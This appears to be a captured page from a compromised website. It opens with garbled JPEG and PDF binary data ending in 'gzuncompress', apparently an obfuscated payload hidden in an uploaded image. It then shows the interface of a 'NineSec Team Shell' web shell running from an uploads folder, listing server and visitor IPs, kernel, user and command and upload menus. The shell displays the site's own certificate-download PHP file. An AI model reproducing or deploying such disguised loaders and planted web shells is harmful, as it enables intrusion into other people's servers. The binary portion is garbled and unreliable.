JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/../

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/../download_certificate.php
<?php
session_start();
if (!isset($_SESSION['user_id'])) {
    header('Location: login.php');
    exit();
}

require_once 'config/database.php';

if (isset($_GET['certificate_id'])) {
    $certificate_id = (int)$_GET['certificate_id'];
    $user_id = $_SESSION['user_id'];
    
    // Verify certificate belongs to user
    $stmt = $pdo->prepare("
        SELECT c.*, e.title, u.first_name, u.last_name 
        FROM certificates c 
        JOIN events e ON c.event_id = e.id 
        JOIN users u ON c.user_id = u.id 
        WHERE c.id = ? AND c.user_id = ?
    ");
    $stmt->execute([$certificate_id, $user_id]);
    $certificate = $stmt->fetch(PDO::FETCH_ASSOC);
    
    if ($certificate && file_exists($certificate['certificate_file'])) {
        // Update download count
        $update_stmt = $pdo->prepare("UPDATE certificates SET download_count = download_count + 1 WHERE id = ?");
        $update_stmt->execute([$certificate_id]);
        
        // Set headers for PDF download
        header('Content-Type: application/pdf');
        header('Content-Disposition: attachment; filename="Certificate_' . $certificate['title'] . '_' . $certificate['first_name'] . '_' . $certificate['last_name'] . '.pdf"');
        header('Content-Length: ' . filesize($certificate['certificate_file']));
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Pragma: public');
        
        readfile($certificate['certificate_file']);
        exit();
    } else {
        $_SESSION['error'] = "Certificate not found or file missing.";
        header('Location: certificates.php');
        exit();
    }
} elseif (isset($_GET['event_id'])) {
    $event_id = (int)$_GET['event_id'];
    $user_id = $_SESSION['user_id'];
    
    // Get certificate by event ID
    $stmt = $pdo->prepare("
        SELECT c.* 
        FROM certificates c 
        WHERE c.event_id = ? AND c.user_id = ?
    ");
    $stmt->execute([$event_id, $user_id]);
    $certificate = $stmt->fetch(PDO::FETCH_ASSOC);
    
    if ($certificate) {
        header('Location: download_certificate.php?certificate_id=' . $certificate['id']);
        exit();
    } else {
        $_SESSION['error'] = "Certificate not found for this event.";
        header('Location: event.php?id=' . $event_id);
        exit();
    }
} else {
    header('Location: certificates.php');
    exit();
}
?>

NineSec Team - 2022